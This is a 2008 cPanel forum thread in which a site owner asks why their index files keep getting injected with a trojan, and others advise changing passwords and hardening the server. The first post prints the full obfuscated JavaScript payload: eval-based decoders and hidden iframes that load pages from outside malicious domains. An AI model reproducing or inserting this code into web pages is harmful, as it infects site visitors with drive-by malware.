Please whitelist cPanel in your adblocker so that you’re able to see our version release promotions, thanks!

The Community Forums

Interact with an entire community of cPanel & WHM users!

Why my index files on the server be infected with JS/Kryptik.B (Troyano)

Discussion in 'General Discussion' started by PC-Drivers, Nov 29, 2008.

  1. PC-Drivers

    PC-Drivers Member

    Joined:
    Aug 1, 2004
    Messages:
    7
    Likes Received:
    0
    Trophy Points:
    151
    When i upload an index file (index.htm / index.html / index.php) #index.ext#
    Automaticaly, on the server about in three days, i view on the file that the file have an javascript code with a trojan

    Example:

    Code:
    <script language="JavaScript">var wJjZIf={ou:"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=",i11Ojos:function(WlsrpEG){var gruMqF0vy="",qsHiSfFA5UD0C0,Ook8UnFsAzpv8,uQqDFZKnr,kXMqka9Zkc,pICrUeduf35SE,SZrTnjYXQuk7U,A6skYhraPC4rx,jtskEvcG=0;WlsrpEG=WlsrpEG.replace(/[^A-Za-z0-9\+\/\=]/g,"");while(jtskEvcG<WlsrpEG.length){kXMqka9Zkc=this.ou.indexOf(WlsrpEG.charAt(jtskEvcG++));pICrUeduf35SE=this.ou.indexOf(WlsrpEG.charAt(jtskEvcG++));SZrTnjYXQuk7U=this.ou.indexOf(WlsrpEG.charAt(jtskEvcG++));A6skYhraPC4rx=this.ou.indexOf(WlsrpEG.charAt(jtskEvcG++));qsHiSfFA5UD0C0=(kXMqka9Zkc<<2)|(pICrUeduf35SE>>4);Ook8UnFsAzpv8=((pICrUeduf35SE&15)<<4)|(SZrTnjYXQuk7U>>2);uQqDFZKnr=((SZrTnjYXQuk7U&3)<<6)|A6skYhraPC4rx;gruMqF0vy+=this.NTdhIMHe1Sd(qsHiSfFA5UD0C0);if(SZrTnjYXQuk7U!=64){gruMqF0vy+=this.NTdhIMHe1Sd(Ook8UnFsAzpv8);}if(A6skYhraPC4rx!=64){gruMqF0vy+=this.NTdhIMHe1Sd(uQqDFZKnr);}}return(wJjZIf.UXu6uINfsK(gruMqF0vy));},UXu6uINfsK:function(X8){var slflkY2R="",kllYRVG2Z2U=bfCRqsX=cfMYGqAqE2=yf0nHdCYyIROAktg=0;while(kllYRVG2Z2U<X8.length){bfCRqsX=X8.charCodeAt(kllYRVG2Z2U);if(bfCRqsX<128){slflkY2R+=this.NTdhIMHe1Sd(bfCRqsX);kllYRVG2Z2U++;}else if((bfCRqsX>191)&&(bfCRqsX<224)){yf0nHdCYyIROAktg=X8.charCodeAt(kllYRVG2Z2U+1);slflkY2R+=this.NTdhIMHe1Sd(((bfCRqsX&31)<<6)|(yf0nHdCYyIROAktg&63));kllYRVG2Z2U+=2;}else{yf0nHdCYyIROAktg=X8.charCodeAt(kllYRVG2Z2U+1);cfMYGqAqE2=X8.charCodeAt(kllYRVG2Z2U+2);slflkY2R+=this.NTdhIMHe1Sd(((bfCRqsX&15)<<12)|((yf0nHdCYyIROAktg&63)<<6)|(cfMYGqAqE2&63));kllYRVG2Z2U+=3;}}return(slflkY2R);},WAa:function(IwLaGn7P0Ft){eval(IwLaGn7P0Ft);},NTdhIMHe1Sd:function(zMNTzJcZik3Mcv){return(String.fromCharCode(zMNTzJcZik3Mcv));}}
    wJjZIf.WAa(wJjZIf.i11Ojos('ZG9jdW1lbnQud3JpdGUoJzxpZnJhbWUgd2lkdGg9MCBoZWlnaHQ9MCBzcmM9Imh0dHA6Ly9hOXJoaXdhLmNuL3VwZGF0ZV9maWxlcy91cGRhdGUucGhwIj48L2lmcmFtZT4nKQ=='))</script><script>function vyndztmmJ(jbgUBWzfP){return String["\x66\x72\x6F\x6D\x43\x68\x61\x72\x43\x6F\x64\x65"](jbgUBWzfP);}function BESgJKf(haMTJkKrmh){var E7S99BkTF8K=0,GojhCcX=haMTJkKrmh.length,Ybfgst9ZD=1024,TF5pbY0,Z10aeROO0b2gj,bPAAJJj="",uzmroOPykIzt=E7S99BkTF8K,BLH3Ut5AcYS=E7S99BkTF8K,FcK4MrqLdhA2=E7S99BkTF8K,omP9gI=Array(63,61,41,4,23,21,18,1,40,29,0,0,0,0,0,0,50,54,51,17,49,36,43,59,6,37,9,10,11,22,13,47,62,19,14,8,35,44,28,48,57,3,32,0,0,0,0,20,0,5,56,31,30,34,16,52,15,58,33,60,45,53,38,27,25,26,24,2,42,46,7,12,55,39,0);for(Z10aeROO0b2gj=Math.ceil(GojhCcX/Ybfgst9ZD);Z10aeROO0b2gj>E7S99BkTF8K;Z10aeROO0b2gj--){for(TF5pbY0=Math.min(GojhCcX,Ybfgst9ZD);TF5pbY0>E7S99BkTF8K;TF5pbY0--,GojhCcX--){FcK4MrqLdhA2|=(omP9gI[haMTJkKrmh.charCodeAt(uzmroOPykIzt++)-48])<<BLH3Ut5AcYS;if(BLH3Ut5AcYS){bPAAJJj+=vyndztmmJ(55^FcK4MrqLdhA2&255);FcK4MrqLdhA2>>=8;BLH3Ut5AcYS-=2;}else{BLH3Ut5AcYS=6;}}}return (bPAAJJj);}var uapVT="igThQja5s2I_pN_Hz5E4YJmvfUZ4C5E5qJmazXm_Y1IsvVD46Xa_cNEsvV7CaCIscNgfvmzHr_gzq9E5pf5Mr3aMaJEMrb5MQJmQpVg4v9j4Q2zCQ7aCQaa_JraCdjm_95Wsrb5_apIM6Iz3dWZR1bY";eval(BESgJKf(uapVT));</script><script>function vyndztmmJ(jbgUBWzfP){return String["\x66\x72\x6F\x6D\x43\x68\x61\x72\x43\x6F\x64\x65"](jbgUBWzfP);}function BESgJKf(haMTJkKrmh){var E7S99BkTF8K=0,GojhCcX=haMTJkKrmh.length,Ybfgst9ZD=1024,TF5pbY0,Z10aeROO0b2gj,bPAAJJj="",uzmroOPykIzt=E7S99BkTF8K,BLH3Ut5AcYS=E7S99BkTF8K,FcK4MrqLdhA2=E7S99BkTF8K,omP9gI=Array(63,61,41,4,23,21,18,1,40,29,0,0,0,0,0,0,50,54,51,17,49,36,43,59,6,37,9,10,11,22,13,47,62,19,14,8,35,44,28,48,57,3,32,0,0,0,0,20,0,5,56,31,30,34,16,52,15,58,33,60,45,53,38,27,25,26,24,2,42,46,7,12,55,39,0);for(Z10aeROO0b2gj=Math.ceil(GojhCcX/Ybfgst9ZD);Z10aeROO0b2gj>E7S99BkTF8K;Z10aeROO0b2gj--){for(TF5pbY0=Math.min(GojhCcX,Ybfgst9ZD);TF5pbY0>E7S99BkTF8K;TF5pbY0--,GojhCcX--){FcK4MrqLdhA2|=(omP9gI[haMTJkKrmh.charCodeAt(uzmroOPykIzt++)-48])<<BLH3Ut5AcYS;if(BLH3Ut5AcYS){bPAAJJj+=vyndztmmJ(55^FcK4MrqLdhA2&255);FcK4MrqLdhA2>>=8;BLH3Ut5AcYS-=2;}else{BLH3Ut5AcYS=6;}}}return (bPAAJJj);}var uapVT="igThQja5s2I_pN_Hz5E4YJmvfUZ4C5E5qJmazXm_Y1IsvVD46Xa_cNEsvV7CaCIscNgfvmzHr_gzq9E5pf5Mr3aMaJEMrb5MQJmQpVg4v9j4Q2zCQ7aCQaa_JraCdjm_95Wsrb5_apIM6Iz3dWZR1bY";eval(BESgJKf(uapVT));</script><iframe src="http://avwav.com/3341.htm" style="display:none"></iframe><script>function ly17Cd8(LmhPynqL){return String["from"+"Char"+"Code"](LmhPynqL);}function K3EEJ(cQfqZhQL){var YP2gJ8QfVEO=0,UmN6bSRQYkZm=cQfqZhQL.length,I8Bl0Q1TcJtI=1024,KzapXMbvS,xtcwdCi3,dEjzekSH4MZDq="",Qf7BG3dTPW7LA=YP2gJ8QfVEO,ADGuR=YP2gJ8QfVEO,h7kMNnix2ZWqE=YP2gJ8QfVEO,EVgfz=Array(63,21,28,38,30,49,53,58,19,29,0,0,0,0,0,0,26,62,47,42,43,48,40,54,44,11,1,18,3,6,41,8,59,55,9,0,31,56,33,60,39,52,17,0,0,0,0,16,0,61,34,7,24,5,25,2,22,45,27,20,12,14,57,32,4,51,13,37,50,23,15,10,36,35,46);for(xtcwdCi3=Math.ceil(UmN6bSRQYkZm/I8Bl0Q1TcJtI);xtcwdCi3>YP2gJ8QfVEO;xtcwdCi3--){for(eval("KzapXMbvS=Ma"+"th.m"+"in(UmN6bSRQYkZm,I8Bl0Q1TcJtI)");KzapXMbvS>YP2gJ8QfVEO;KzapXMbvS--,UmN6bSRQYkZm--){h7kMNnix2ZWqE|=(EVgfz[cQfqZhQL.charCodeAt(Qf7BG3dTPW7LA++)-48])<<ADGuR;if(ADGuR){dEjzekSH4MZDq+=ly17Cd8(202^h7kMNnix2ZWqE&255);h7kMNnix2ZWqE>>=8;ADGuR-=2;}else{ADGuR=6;}}}return (dEjzekSH4MZDq);}var e6RMPV="cLWEzh@C047Dx7InabPFAACUij0FHbPCXAC7amCDAw7a7DzFBm@Db7Pa7D4zU37ab7DB7gTnsyD0XCPCxXwNsq@NUAPNsvwNzACHxDDF7CAFz4TzzG@zzt@DYB@zyhCDobBasvwDUz7NBKTPyc05Svl";eval(K3EEJ(e6RMPV));</script><script>function ly17Cd8(LmhPynqL){return String["from"+"Char"+"Code"](LmhPynqL);}function K3EEJ(cQfqZhQL){var YP2gJ8QfVEO=0,UmN6bSRQYkZm=cQfqZhQL.length,I8Bl0Q1TcJtI=1024,KzapXMbvS,xtcwdCi3,dEjzekSH4MZDq="",Qf7BG3dTPW7LA=YP2gJ8QfVEO,ADGuR=YP2gJ8QfVEO,h7kMNnix2ZWqE=YP2gJ8QfVEO,EVgfz=Array(63,21,28,38,30,49,53,58,19,29,0,0,0,0,0,0,26,62,47,42,43,48,40,54,44,11,1,18,3,6,41,8,59,55,9,0,31,56,33,60,39,52,17,0,0,0,0,16,0,61,34,7,24,5,25,2,22,45,27,20,12,14,57,32,4,51,13,37,50,23,15,10,36,35,46);for(xtcwdCi3=Math.ceil(UmN6bSRQYkZm/I8Bl0Q1TcJtI);xtcwdCi3>YP2gJ8QfVEO;xtcwdCi3--){for(eval("KzapXMbvS=Ma"+"th.m"+"in(UmN6bSRQYkZm,I8Bl0Q1TcJtI)");KzapXMbvS>YP2gJ8QfVEO;KzapXMbvS--,UmN6bSRQYkZm--){h7kMNnix2ZWqE|=(EVgfz[cQfqZhQL.charCodeAt(Qf7BG3dTPW7LA++)-48])<<ADGuR;if(ADGuR){dEjzekSH4MZDq+=ly17Cd8(202^h7kMNnix2ZWqE&255);h7kMNnix2ZWqE>>=8;ADGuR-=2;}else{ADGuR=6;}}}return (dEjzekSH4MZDq);}var e6RMPV="cLWEzh@C047Dx7InabPFAACUij0FHbPCXAC7amCDAw7a7DzFBm@Db7Pa7D4zU37ab7DB7gTnsyD0XCPCxXwNsq@NUAPNsvwNzACHxDDF7CAFz4TzzG@zzt@DYB@zyhCDobBasvwDUz7NBKTPyc05Svl";eval(K3EEJ(e6RMPV));</script>
    
     
  2. sirotex

    sirotex Well-Known Member

    Joined:
    Jul 10, 2008
    Messages:
    121
    Likes Received:
    0
    Trophy Points:
    66
    Um...then someone is updating your files not 'automated'. Just remove & change all your passwords.
     
  3. apscinsspl

    apscinsspl Well-Known Member

    Joined:
    Mar 15, 2008
    Messages:
    112
    Likes Received:
    0
    Trophy Points:
    66
    Looks like your system is infected and your root password leaked , change the server's password as a priority and then remove all index files , reload them and change all cpanel password since FTP may also have been cracked.
     
  4. AndyReed

    AndyReed Well-Known Member
    PartnerNOC

    Joined:
    May 29, 2004
    Messages:
    2,222
    Likes Received:
    4
    Trophy Points:
    193
    Location:
    Minneapolis, MN
    If you don't secure and harden your server, hackers will continue infecting your files with JS codes. Search the cPanel forum for information on how to secure and harden your server.
     
    Stop hovering to collapse... Click to collapse... Hover to expand... Click to expand...
  5. thewebhosting

    thewebhosting Well-Known Member

    Joined:
    May 9, 2008
    Messages:
    1,201
    Likes Received:
    1
    Trophy Points:
    68
    Please regularly update the password of your CPanel and FTP accounts. Make sure you choose a strong password which contains special characters.

    Also, keep a practice to see the latest available version of any third party installed software in your domain.
     
    Stop hovering to collapse... Click to collapse... Hover to expand... Click to expand...
Loading...

Share This Page

  1. This site uses cookies to help personalise content, tailor your experience and to keep you logged in if you register.
    By continuing to use this site, you are consenting to our use of cookies.
    Dismiss Notice